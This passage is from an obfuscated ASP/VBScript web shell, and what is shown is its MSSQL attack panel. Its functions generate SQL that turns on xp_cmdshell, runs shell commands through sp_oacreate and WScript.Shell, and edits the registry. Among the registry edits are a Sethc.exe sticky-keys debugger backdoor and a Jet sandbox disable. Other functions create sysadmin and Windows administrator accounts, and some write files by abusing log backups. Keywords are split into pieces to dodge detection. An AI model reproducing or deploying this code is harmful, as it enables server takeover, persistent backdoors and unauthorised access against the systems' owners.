Thenform2.umjg.value="If object_id('dark_temp')is not null drop table dark_temp;create table dark_temp(aa nvarchar(4000));bulk insert dark_temp from'"&oaow&"'"Elseform2.umjg.value="declare @a int;exec ma"&tifz&"ster..sp_oacr"&bbaf&"eate'WS"&jqx&"cript.Sh"&ndhkc&"ell',@a output;exec ma"&tifz&"ster..sp_o"&xad&"amethod @a,'run',null,'"&qeq&" > "&oaow&"',0,'true'"End IfEnd FunctionFunction mmkp(mfy,bxwc,kncxy,ojn)Select Case ojnCase 1form2.umjg.value="exec ma"&tifz&"ster..xp_regwrite 'HKEY_LOCAL_MACHINE','SOF"&qiso&"TWARE\Microsoft\Jet\4.0\Eng"&igmiu&"ines','San"&rscm&"dBoxMode','REG_DWORD',0"Case 2mfy=Replace(mfy,"""","""""")form2.umjg.value="Select * From op"&asmga&"enrowSet('Microsoft.Jet.OLEDB.4.0',';Database="&bxwc&"','select shell("""&mfy&" > "&kncxy&""")')"Case 3form2.umjg.value="If object_id('dark_temp')is not null drop table dark_temp;create table dark_temp(aa nvarchar(4000));bulk insert dark_temp from'"&kncxy&"'"End SelectEnd FunctionFunction tbf(vpi,cir)form2.umjg.value="declare @a int;exec ma"&tifz&"ster..sp_oacr"&bbaf&"eate'Scri"&nfbne&"pting.FileSystemOb"&yig&"ject',@a output;exec ma"&tifz&"ster..sp_o"&xad&"amethod @a,'CopyFile',null,'"&vpi&"','"&cir&"'"End FunctionFunction brvy(qvgzg,utj)form2.umjg.value="exec ma"&tifz&"ster..xp_makecab 'C:\windows\temp\~098611.tmp','default',1,'"&qvgzg&"';exec ma"&tifz&"ster..xp_unpackcab 'C:\windows\temp\~098611.tmp','"&qjr(utj,"\",False)&"',1,'"&niih(utj,"\")&"'"End FunctionFunction latdl(qhgwo,qsn)form2.umjg.value="Use ma"&tifz&"ster;dbcc addextEndedp"&jdi&"roc('"&qhgwo&"','"&qsn&"')"End FunctionFunction ikpdz(uisna)form2.umjg.value="Use ma"&tifz&"ster;dbcc dropextEndedproc('"&uisna&"')"End FunctionFunction fffgo(xyutv)form2.umjg.value="EXEC ma"&tifz&"ster..sp_configure 'show advanced options',1;RECONFIGURE;EXEC ma"&tifz&"ster..sp_configure '"&xyutv&"',1;RECONFIGURE"End FunctionFunction dxca(ugkk,fzspl,gyu)Dim mcewmcew=iung(ugkk)form2.umjg.value="exec ma"&tifz&"ster..xp_regwrite '"&mcew(0)&"','"&mcew(1)&"','"&mcew(2)&"','"&fzspl&"','"&gyu&"'"End FunctionFunction ppaum(name,pass)form2.umjg.value="exec ma"&tifz&"ster..sp_addlogin '"&name&"','"&pass&"';exec ma"&tifz&"ster..sp_addsrvrolemem"&wet&"ber '"&name&"','sysadmin'"End FunctionFunction scntp(name,pass)form2.umjg.value="declare @a int;exec ma"&tifz&"ster..sp_oacr"&bbaf&"eate 'ScriptControl',@a output;exec ma"&tifz&"ster..sp_oase"&jcmuw&"tproperty @a,'language','VBScript';exec ma"&tifz&"ster..sp_o"&xad&"amethod @a,'addcode',null,'sub add():Set o=CreateObject(""She"&gmg&"ll.Users""):Set u=o.create("""&name&"""):u.ChangePassw"&aozu&"ord """&pass&""","""":u.setting(""AccountType"")=3:end sub';exec ma"&tifz&"ster..sp_o"&xad&"amethod @a,'run',null,'add'"End FunctionFunction bqyzj(tier,ytxy,cbrvy,rabze)Select Case rabzeCase 1form2.umjg.value="alter database "&cbrvy&" Set recovery full;dump transaction "&cbrvy&" with no_log;If object_id('dark_temp')is not null drop table dark_temp;create table dark_temp(aa sql_variant primary key)"Case 2form2.umjg.value="backup database "&cbrvy&" to disk='C:\windows\temp\~098611.tmp' with init"Case 3form2.umjg.value="insert dark_temp values('"&Replace(tier,"'","''")&"')"Case 4form2.umjg.value="backup log "&cbrvy&" to disk='"&ytxy&"';drop table dark_temp"End SelectEnd FunctionFunction bfg(cbrvy)On Error Resume NextDim vaxfu,pftemSet vaxfu=new RegExpvaxfu.Global=Truevaxfu.IgnoreCase=Truevaxfu.MultiLine=Truevaxfu.Pattern="(Database|Initial Catalog) *=[^;]+"If vaxfu.test(sqlForm.qyoud.value)ThensqlForm.qyoud.value=vvv(vaxfu.Replace(sqlForm.qyoud.value,"$1="&cbrvy))sqlForm.ildc="lnv"sqlForm.submitElseWindow.alert("Can not get database name in connect string!")End IfEnd FunctionFunction qjr(str,ipu,dtw)If str="" Or InStr(str,ipu)<1 Thenqjr=""Exit FunctionEnd IfIf dtw Thenqjr=Left(str,InStr(str,ipu)-1)Elseqjr=Left(str,InstrRev(str,ipu)-1)End IfEnd FunctionFunction niih(str,ipu)If str="" Or InStr(str,ipu)<1 Thenniih=""Exit FunctionEnd Ifniih=Mid(str,InstrRev(str,ipu)+Len(ipu))End Function</script><%End IfIf ildc="kej"And umjg=""ThenIf dorg="others"Thenumjg="select * from "&ajtoElseumjg="select * from ["&ajto&"]"End IfEnd Ifqynt "lnv","","","","","Show Tables",""echo"<br>"ekgsj Truerlb"ildc","kej"rlb"qyoud",qyoudbrsr"100%"If dorg="mssql"Thenfdlz 1dmj"<td colspan=3>Version : "&ihz(orl)&"</td>"dohoskvmbj="sysadmin|db_owner|public"fdlz 0echo"<td colspan=3>"For Each strrole In Split(kvmbj,"|")If strrole="sysadmin"Thenrs.Open "select IS_SRVROLEMEMBER('"&strrole&"')",conn,1,1Elsers.Open "select IS_ROLEMEMBER('"&strrole&"')",conn,1,1End IfIf rs(0)=1 Thenecho "Current ServerRole : <font color='red'>"&strrole&"</font> "rs.closeExit ForEnd Ifrs.closeNextecho "| Switch Database : "rs.Open "select name from ma"&tifz&"ster..sysdatabases",conn,1,1rs.movefirstDo While Not rs.eofecho "<a href=javascript:bfg('"&rs("name")&"')>"&rs("name")&"</a> | "rs.movenextLoopecho"</td></tr>"nvzmrs.closeSet rs=NothingEnd Iffdlz 1doTd"Execute Sql","10%"pdlc"umjg",umjg,5krxrz"Submit","10%"dohosuxpnfhqovIf dorg="mssql"Thenecho"Functions : "urmqs=Split("xp_cmd|xp_dir|xp_reg|xp_regw|wsexec|sbexec|fsocopy|makecab|addproc|delproc|enfunc|addlogin|addsys|logback|oxxk|lug","|")buds=Split("xp_cmdshell|xp_dirtree|xp_regread|xp_regwrite|ws exec|sandbox exec|FSO copy|Cab copy|add procedure|del procedure|enable function|add sql user|add sys user|logbackup|saupfile|sadownfile","|")For i=0 To UBound(urmqs)echo"<a href='Nextecho"<br><br>"xpmj"xp_cmd",Truebrsr"100%"fdlz 1doTd"co"&bad&"mmand","10%"qaj"text","zeok","ne"&boplk&"t user","80%","",""qaj"button","","Generate","10%","onClick=""javascript:wsrj(zeok.value)""",""dohosuxpnecho"</span>"xpmj"xp_dir",Truebrsr"100%"fdlz 1doTd"Path","10%"qaj"text","tjaoy",tdm,"80%","",""qaj"button","","Generate","10%","onClick=""javascript:zwrvw(tjaoy.value)""",""dohosuxpnecho"</span>"xpmj"xp_reg",Truebrsr"100%"fdlz 1doTd"Path","10%"qaj"text","xpregpath","HKEY_LOCAL_MACHINE\SYSTEM\CurrentC"&vetz&"ontrolSet\Control\ComputerNa"&mfn&"me\ComputerNa"&mfn&"me\ComputerNa"&mfn&"me","80%","",""qaj"button","","Generate","10%","onClick=""javascript:riws(xpregpath.value)""",""dohosuxpnecho"</span>"xpmj"xp_regw",Truebrsr"100%"fdlz 1doTd"Path","10%"qaj"text","ugkk","HKEY_LOCAL_MACHINE\SOF"&qiso&"TWARE\Microsoft\Windo"&lisdj&"ws NT\Current"&plxoc&"Version\Image File Execution Options\Sethc.exe\debugger","80%","","4"dohos